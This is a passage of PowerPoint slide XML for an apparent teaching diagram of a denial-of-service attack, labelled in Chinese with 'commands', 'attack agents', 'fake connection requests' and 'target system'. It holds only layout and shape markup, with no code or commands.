            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1327687">
              <a:off x="2449513" y="2777526"/>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50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
                <a:t>指令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2514600"/>
            <a:ext cx="3924300" cy="2667000"/>
            <a:chOff x="4114800" y="2514600"/>
            <a:chExt cx="3924300" cy="2667000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37980" name="Line 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5715000" y="3962400"/>
              <a:ext cx="1828800" cy="533400"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot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1" name="Line 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4800600" y="4114800"/>
              <a:ext cx="2819400" cy="1066800"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot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2" name="Line 114"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="3200400"/>
              <a:ext cx="1828800" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot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3" name="Line 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2514600"/>
              <a:ext cx="2819400" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot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4" name="Line 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4114800" y="3810000"/>
              <a:ext cx="3429000" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot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5" name="PPBand287"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1090556">
              <a:off x="5334000" y="2556943"/>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spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1">
                  <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>虚假的连接请求</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="组合 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7308850" y="3213100"/>
            <a:ext cx="1446213" cy="1511300"/>
            <a:chOff x="7230144" y="3140968"/>
            <a:chExt cx="1446312" cy="1512168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37977" name="Picture 9" descr="desktopp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3786" y="3140968"/>
              <a:ext cx="884564" cy="97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8" name="PPBand274"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7230144" y="4265338"/>
              <a:ext cx="1446312"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lnSpc>
                  <a:spcPct val="80000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
                <a:t>目标系统</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3797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568" y="329546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bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="1557338"/>
            <a:ext cx="2232025" cy="3990975"/>
            <a:chOff x="3428603" y="1556792"/>
            <a:chExt cx="2232422" cy="3991521"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="37902" name="Object 0"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4267200" y="2362200"/>
            <a:ext cx="474663" cy="520700"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s647318" name="Photo Editor Photo" r:id="rId4" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId4" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6473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3622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3" name="Object 1"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5181600" y="3048000"/>
            <a:ext cx="474663" cy="522288"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s647319" name="Photo Editor Photo" r:id="rId6" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId6" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6473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0480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4" name="Object 2"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4267200" y="5029200"/>
            <a:ext cx="471488" cy="519113"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s647320" name="Photo Editor Photo" r:id="rId7" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId7" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6473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50292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5" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="5181600" y="4267200"/>
            <a:ext cx="479425" cy="527050"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s647321" name="Photo Editor Photo" r:id="rId8" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Photo Editor Photo" r:id="rId8" imgW="952500" imgH="1047750" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="图片 6473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2672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906" name="Picture 100"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4267200" y="2133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7" name="Picture 101"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5181600" y="2819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Picture 103"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5181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9" name="Picture 104"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4267200" y="4800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PPBand285"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3459088" y="1556792"/>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spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
                <a:t>攻击代理</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37911" name="Group 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3428603" y="3581400"/>
              <a:ext cx="762000" cy="685800"/>
              <a:chOff x="432" y="2835"/>
              <a:chExt cx="1238" cy="1123"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37913" name="Freeform 26"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="619" y="2844"/>
                <a:ext cx="132" cy="106"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 397"/>
                  <a:gd name="T1" fmla="*/ 0 h 318"/>
                  <a:gd name="T2" fmla="*/ 0 w 397"/>
                  <a:gd name="T3" fmla="*/ 0 h 318"/>
                  <a:gd name="T4" fmla="*/ 0 w 397"/>
                  <a:gd name="T5" fmla="*/ 0 h 318"/>
                  <a:gd name="T6" fmla="*/ 0 w 397"/>
                  <a:gd name="T7" fmla="*/ 0 h 318"/>
                  <a:gd name="T8" fmla="*/ 0 w 397"/>
                  <a:gd name="T9" fmla="*/ 0 h 318"/>
                  <a:gd name="T10" fmla="*/ 0 w 397"/>
                  <a:gd name="T11" fmla="*/ 0 h 318"/>
                  <a:gd name="T12" fmla="*/ 0 w 397"/>
                  <a:gd name="T13" fmla="*/ 0 h 318"/>
                  <a:gd name="T14" fmla="*/ 0 w 397"/>
                  <a:gd name="T15" fmla="*/ 0 h 318"/>
                  <a:gd name="T16" fmla="*/ 0 w 397"/>
                  <a:gd name="T17" fmla="*/ 0 h 318"/>
                  <a:gd name="T18" fmla="*/ 0 w 397"/>
                  <a:gd name="T19" fmla="*/ 0 h 318"/>
                  <a:gd name="T20" fmla="*/ 0 w 397"/>
                  <a:gd name="T21" fmla="*/ 0 h 318"/>
                  <a:gd name="T22" fmla="*/ 0 w 397"/>
                  <a:gd name="T23" fmla="*/ 0 h 318"/>
                  <a:gd name="T24" fmla="*/ 0 w 397"/>
                  <a:gd name="T25" fmla="*/ 0 h 318"/>
                  <a:gd name="T26" fmla="*/ 0 w 397"/>
                  <a:gd name="T27" fmla="*/ 0 h 318"/>
                  <a:gd name="T28" fmla="*/ 0 w 397"/>
                  <a:gd name="T29" fmla="*/ 0 h 318"/>
                  <a:gd name="T30" fmla="*/ 0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4" name="Freeform 27"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="679" y="2857"/>
                <a:ext cx="978" cy="374"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2934"/>
                  <a:gd name="T1" fmla="*/ 0 h 1122"/>
                  <a:gd name="T2" fmla="*/ 0 w 2934"/>
                  <a:gd name="T3" fmla="*/ 0 h 1122"/>
                  <a:gd name="T4" fmla="*/ 0 w 2934"/>
                  <a:gd name="T5" fmla="*/ 0 h 1122"/>
                  <a:gd name="T6" fmla="*/ 0 w 2934"/>
                  <a:gd name="T7" fmla="*/ 0 h 1122"/>
                  <a:gd name="T8" fmla="*/ 0 w 2934"/>
                  <a:gd name="T9" fmla="*/ 0 h 1122"/>
                  <a:gd name="T10" fmla="*/ 0 w 2934"/>
                  <a:gd name="T11" fmla="*/ 0 h 1122"/>
                  <a:gd name="T12" fmla="*/ 0 w 2934"/>
                  <a:gd name="T13" fmla="*/ 0 h 1122"/>
                  <a:gd name="T14" fmla="*/ 0 w 2934"/>
                  <a:gd name="T15" fmla="*/ 0 h 1122"/>
                  <a:gd name="T16" fmla="*/ 0 w 2934"/>
                  <a:gd name="T17" fmla="*/ 0 h 1122"/>
                  <a:gd name="T18" fmla="*/ 0 w 2934"/>
                  <a:gd name="T19" fmla="*/ 0 h 1122"/>
                  <a:gd name="T20" fmla="*/ 0 w 2934"/>
                  <a:gd name="T21" fmla="*/ 0 h 1122"/>
                  <a:gd name="T22" fmla="*/ 0 w 2934"/>
                  <a:gd name="T23" fmla="*/ 0 h 1122"/>
                  <a:gd name="T24" fmla="*/ 0 w 2934"/>
                  <a:gd name="T25" fmla="*/ 0 h 1122"/>
                  <a:gd name="T26" fmla="*/ 0 w 2934"/>
                  <a:gd name="T27" fmla="*/ 0 h 1122"/>
                  <a:gd name="T28" fmla="*/ 0 w 2934"/>
                  <a:gd name="T29" fmla="*/ 0 h 1122"/>
                  <a:gd name="T30" fmla="*/ 0 w 2934"/>
                  <a:gd name="T31" fmla="*/ 0 h 1122"/>
                  <a:gd name="T32" fmla="*/ 0 w 2934"/>
                  <a:gd name="T33" fmla="*/ 0 h 1122"/>
                  <a:gd name="T34" fmla="*/ 0 w 2934"/>
                  <a:gd name="T35" fmla="*/ 0 h 1122"/>
                  <a:gd name="T36" fmla="*/ 0 w 2934"/>
                  <a:gd name="T37" fmla="*/ 0 h 1122"/>
                  <a:gd name="T38" fmla="*/ 0 w 2934"/>
                  <a:gd name="T39" fmla="*/ 0 h 1122"/>
                  <a:gd name="T40" fmla="*/ 0 w 2934"/>
                  <a:gd name="T41" fmla="*/ 0 h 1122"/>
                  <a:gd name="T42" fmla="*/ 0 w 2934"/>
                  <a:gd name="T43" fmla="*/ 0 h 1122"/>
                  <a:gd name="T44" fmla="*/ 0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5" name="Freeform 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="713" y="2899"/>
                <a:ext cx="911" cy="326"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2734"/>
                  <a:gd name="T1" fmla="*/ 0 h 978"/>
                  <a:gd name="T2" fmla="*/ 0 w 2734"/>
                  <a:gd name="T3" fmla="*/ 0 h 978"/>
                  <a:gd name="T4" fmla="*/ 0 w 2734"/>
                  <a:gd name="T5" fmla="*/ 0 h 978"/>
                  <a:gd name="T6" fmla="*/ 0 w 2734"/>
                  <a:gd name="T7" fmla="*/ 0 h 978"/>
                  <a:gd name="T8" fmla="*/ 0 w 2734"/>
                  <a:gd name="T9" fmla="*/ 0 h 978"/>
                  <a:gd name="T10" fmla="*/ 0 w 2734"/>
                  <a:gd name="T11" fmla="*/ 0 h 978"/>
                  <a:gd name="T12" fmla="*/ 0 w 2734"/>
                  <a:gd name="T13" fmla="*/ 0 h 978"/>
                  <a:gd name="T14" fmla="*/ 0 w 2734"/>
                  <a:gd name="T15" fmla="*/ 0 h 978"/>
                  <a:gd name="T16" fmla="*/ 0 w 2734"/>
                  <a:gd name="T17" fmla="*/ 0 h 978"/>
                  <a:gd name="T18" fmla="*/ 0 w 2734"/>
                  <a:gd name="T19" fmla="*/ 0 h 978"/>
                  <a:gd name="T20" fmla="*/ 0 w 2734"/>
                  <a:gd name="T21" fmla="*/ 0 h 978"/>
                  <a:gd name="T22" fmla="*/ 0 w 2734"/>
                  <a:gd name="T23" fmla="*/ 0 h 978"/>
                  <a:gd name="T24" fmla="*/ 0 w 2734"/>
                  <a:gd name="T25" fmla="*/ 0 h 978"/>
                  <a:gd name="T26" fmla="*/ 0 w 2734"/>
                  <a:gd name="T27" fmla="*/ 0 h 978"/>
                  <a:gd name="T28" fmla="*/ 0 w 2734"/>
                  <a:gd name="T29" fmla="*/ 0 h 978"/>
                  <a:gd name="T30" fmla="*/ 0 w 2734"/>
                  <a:gd name="T31" fmla="*/ 0 h 978"/>
                  <a:gd name="T32" fmla="*/ 0 w 2734"/>
                  <a:gd name="T33" fmla="*/ 0 h 978"/>
                  <a:gd name="T34" fmla="*/ 0 w 2734"/>
                  <a:gd name="T35" fmla="*/ 0 h 978"/>
                  <a:gd name="T36" fmla="*/ 0 w 2734"/>
                  <a:gd name="T37" fmla="*/ 0 h 978"/>
                  <a:gd name="T38" fmla="*/ 0 w 2734"/>
                  <a:gd name="T39" fmla="*/ 0 h 978"/>
                  <a:gd name="T40" fmla="*/ 0 w 2734"/>
                  <a:gd name="T41" fmla="*/ 0 h 978"/>
                  <a:gd name="T42" fmla="*/ 0 w 2734"/>
                  <a:gd name="T43" fmla="*/ 0 h 978"/>
                  <a:gd name="T44" fmla="*/ 0 w 2734"/>
                  <a:gd name="T45" fmla="*/ 0 h 978"/>
                  <a:gd name="T46" fmla="*/ 0 w 2734"/>
                  <a:gd name="T47" fmla="*/ 0 h 978"/>
                  <a:gd name="T48" fmla="*/ 0 w 2734"/>
                  <a:gd name="T49" fmla="*/ 0 h 978"/>
                  <a:gd name="T50" fmla="*/ 0 w 2734"/>
                  <a:gd name="T51" fmla="*/ 0 h 978"/>
                  <a:gd name="T52" fmla="*/ 0 w 2734"/>
                  <a:gd name="T53" fmla="*/ 0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6" name="Freeform 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="624" y="2872"/>
                <a:ext cx="110" cy="79"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 332"/>
                  <a:gd name="T1" fmla="*/ 0 h 237"/>
                  <a:gd name="T2" fmla="*/ 0 w 332"/>
                  <a:gd name="T3" fmla="*/ 0 h 237"/>
                  <a:gd name="T4" fmla="*/ 0 w 332"/>
                  <a:gd name="T5" fmla="*/ 0 h 237"/>
                  <a:gd name="T6" fmla="*/ 0 w 332"/>
                  <a:gd name="T7" fmla="*/ 0 h 237"/>
                  <a:gd name="T8" fmla="*/ 0 w 332"/>
                  <a:gd name="T9" fmla="*/ 0 h 237"/>
                  <a:gd name="T10" fmla="*/ 0 w 332"/>
                  <a:gd name="T11" fmla="*/ 0 h 237"/>
                  <a:gd name="T12" fmla="*/ 0 w 332"/>
                  <a:gd name="T13" fmla="*/ 0 h 237"/>
                  <a:gd name="T14" fmla="*/ 0 w 332"/>
                  <a:gd name="T15" fmla="*/ 0 h 237"/>
                  <a:gd name="T16" fmla="*/ 0 w 332"/>
                  <a:gd name="T17" fmla="*/ 0 h 237"/>
                  <a:gd name="T18" fmla="*/ 0 w 332"/>
                  <a:gd name="T19" fmla="*/ 0 h 237"/>
                  <a:gd name="T20" fmla="*/ 0 w 332"/>
                  <a:gd name="T21" fmla="*/ 0 h 237"/>
                  <a:gd name="T22" fmla="*/ 0 w 332"/>
                  <a:gd name="T23" fmla="*/ 0 h 237"/>
                  <a:gd name="T24" fmla="*/ 0 w 332"/>
                  <a:gd name="T25" fmla="*/ 0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7" name="Freeform 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2951"/>
                <a:ext cx="1066" cy="996"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3199"/>
                  <a:gd name="T1" fmla="*/ 0 h 2988"/>
                  <a:gd name="T2" fmla="*/ 0 w 3199"/>
                  <a:gd name="T3" fmla="*/ 0 h 2988"/>
                  <a:gd name="T4" fmla="*/ 0 w 3199"/>
                  <a:gd name="T5" fmla="*/ 0 h 2988"/>
                  <a:gd name="T6" fmla="*/ 0 w 3199"/>
                  <a:gd name="T7" fmla="*/ 0 h 2988"/>
                  <a:gd name="T8" fmla="*/ 0 w 3199"/>
                  <a:gd name="T9" fmla="*/ 0 h 2988"/>
                  <a:gd name="T10" fmla="*/ 0 w 3199"/>
                  <a:gd name="T11" fmla="*/ 0 h 2988"/>
                  <a:gd name="T12" fmla="*/ 0 w 3199"/>
                  <a:gd name="T13" fmla="*/ 0 h 2988"/>
                  <a:gd name="T14" fmla="*/ 0 w 3199"/>
                  <a:gd name="T15" fmla="*/ 0 h 2988"/>
                  <a:gd name="T16" fmla="*/ 0 w 3199"/>
                  <a:gd name="T17" fmla="*/ 0 h 2988"/>
                  <a:gd name="T18" fmla="*/ 0 w 3199"/>
                  <a:gd name="T19" fmla="*/ 0 h 2988"/>
                  <a:gd name="T20" fmla="*/ 0 w 3199"/>
                  <a:gd name="T21" fmla="*/ 0 h 2988"/>
                  <a:gd name="T22" fmla="*/ 0 w 3199"/>
                  <a:gd name="T23" fmla="*/ 0 h 2988"/>
                  <a:gd name="T24" fmla="*/ 0 w 3199"/>
                  <a:gd name="T25" fmla="*/ 0 h 2988"/>
                  <a:gd name="T26" fmla="*/ 0 w 3199"/>
                  <a:gd name="T27" fmla="*/ 0 h 2988"/>
                  <a:gd name="T28" fmla="*/ 0 w 3199"/>
                  <a:gd name="T29" fmla="*/ 0 h 2988"/>
                  <a:gd name="T30" fmla="*/ 0 w 3199"/>
                  <a:gd name="T31" fmla="*/ 0 h 2988"/>
                  <a:gd name="T32" fmla="*/ 0 w 3199"/>
                  <a:gd name="T33" fmla="*/ 0 h 2988"/>
                  <a:gd name="T34" fmla="*/ 0 w 3199"/>
                  <a:gd name="T35" fmla="*/ 0 h 2988"/>
                  <a:gd name="T36" fmla="*/ 0 w 3199"/>
                  <a:gd name="T37" fmla="*/ 0 h 2988"/>
                  <a:gd name="T38" fmla="*/ 0 w 3199"/>
                  <a:gd name="T39" fmla="*/ 0 h 2988"/>
                  <a:gd name="T40" fmla="*/ 0 w 3199"/>
                  <a:gd name="T41" fmla="*/ 0 h 2988"/>
                  <a:gd name="T42" fmla="*/ 0 w 3199"/>
                  <a:gd name="T43" fmla="*/ 0 h 2988"/>
                  <a:gd name="T44" fmla="*/ 0 w 3199"/>
                  <a:gd name="T45" fmla="*/ 0 h 2988"/>
                  <a:gd name="T46" fmla="*/ 0 w 3199"/>
                  <a:gd name="T47" fmla="*/ 0 h 2988"/>
                  <a:gd name="T48" fmla="*/ 0 w 3199"/>
                  <a:gd name="T49" fmla="*/ 0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8" name="Freeform 31"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="763" y="3008"/>
                <a:ext cx="585" cy="575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1757"/>
                  <a:gd name="T1" fmla="*/ 0 h 1724"/>
                  <a:gd name="T2" fmla="*/ 0 w 1757"/>
                  <a:gd name="T3" fmla="*/ 0 h 1724"/>
                  <a:gd name="T4" fmla="*/ 0 w 1757"/>
                  <a:gd name="T5" fmla="*/ 0 h 1724"/>
                  <a:gd name="T6" fmla="*/ 0 w 1757"/>
                  <a:gd name="T7" fmla="*/ 0 h 1724"/>
                  <a:gd name="T8" fmla="*/ 0 w 1757"/>
                  <a:gd name="T9" fmla="*/ 0 h 1724"/>
                  <a:gd name="T10" fmla="*/ 0 w 1757"/>
                  <a:gd name="T11" fmla="*/ 0 h 1724"/>
                  <a:gd name="T12" fmla="*/ 0 w 1757"/>
                  <a:gd name="T13" fmla="*/ 0 h 1724"/>
                  <a:gd name="T14" fmla="*/ 0 w 1757"/>
                  <a:gd name="T15" fmla="*/ 0 h 1724"/>
                  <a:gd name="T16" fmla="*/ 0 w 1757"/>
                  <a:gd name="T17" fmla="*/ 0 h 1724"/>
                  <a:gd name="T18" fmla="*/ 0 w 1757"/>
                  <a:gd name="T19" fmla="*/ 0 h 1724"/>
                  <a:gd name="T20" fmla="*/ 0 w 1757"/>
                  <a:gd name="T21" fmla="*/ 0 h 1724"/>
                  <a:gd name="T22" fmla="*/ 0 w 1757"/>
                  <a:gd name="T23" fmla="*/ 0 h 1724"/>
                  <a:gd name="T24" fmla="*/ 0 w 1757"/>
                  <a:gd name="T25" fmla="*/ 0 h 1724"/>
                  <a:gd name="T26" fmla="*/ 0 w 1757"/>
                  <a:gd name="T27" fmla="*/ 0 h 1724"/>
                  <a:gd name="T28" fmla="*/ 0 w 1757"/>
                  <a:gd name="T29" fmla="*/ 0 h 1724"/>
                  <a:gd name="T30" fmla="*/ 0 w 1757"/>
                  <a:gd name="T31" fmla="*/ 0 h 1724"/>
                  <a:gd name="T32" fmla="*/ 0 w 1757"/>
                  <a:gd name="T33" fmla="*/ 0 h 1724"/>
                  <a:gd name="T34" fmla="*/ 0 w 1757"/>
                  <a:gd name="T35" fmla="*/ 0 h 1724"/>
                  <a:gd name="T36" fmla="*/ 0 w 1757"/>
                  <a:gd name="T37" fmla="*/ 0 h 1724"/>
                  <a:gd name="T38" fmla="*/ 0 w 1757"/>
                  <a:gd name="T39" fmla="*/ 0 h 1724"/>
                  <a:gd name="T40" fmla="*/ 0 w 1757"/>
                  <a:gd name="T41" fmla="*/ 0 h 1724"/>
                  <a:gd name="T42" fmla="*/ 0 w 1757"/>
                  <a:gd name="T43" fmla="*/ 0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19" name="Freeform 32"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="438" y="3229"/>
                <a:ext cx="462" cy="251"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1386"/>
                  <a:gd name="T1" fmla="*/ 0 h 753"/>
                  <a:gd name="T2" fmla="*/ 0 w 1386"/>
                  <a:gd name="T3" fmla="*/ 0 h 753"/>
                  <a:gd name="T4" fmla="*/ 0 w 1386"/>
                  <a:gd name="T5" fmla="*/ 0 h 753"/>
                  <a:gd name="T6" fmla="*/ 0 w 1386"/>
                  <a:gd name="T7" fmla="*/ 0 h 753"/>
                  <a:gd name="T8" fmla="*/ 0 w 1386"/>
                  <a:gd name="T9" fmla="*/ 0 h 753"/>
                  <a:gd name="T10" fmla="*/ 0 w 1386"/>
                  <a:gd name="T11" fmla="*/ 0 h 753"/>
                  <a:gd name="T12" fmla="*/ 0 w 1386"/>
                  <a:gd name="T13" fmla="*/ 0 h 753"/>
                  <a:gd name="T14" fmla="*/ 0 w 1386"/>
                  <a:gd name="T15" fmla="*/ 0 h 753"/>
                  <a:gd name="T16" fmla="*/ 0 w 1386"/>
                  <a:gd name="T17" fmla="*/ 0 h 753"/>
                  <a:gd name="T18" fmla="*/ 0 w 1386"/>
                  <a:gd name="T19" fmla="*/ 0 h 753"/>
                  <a:gd name="T20" fmla="*/ 0 w 1386"/>
                  <a:gd name="T21" fmla="*/ 0 h 753"/>
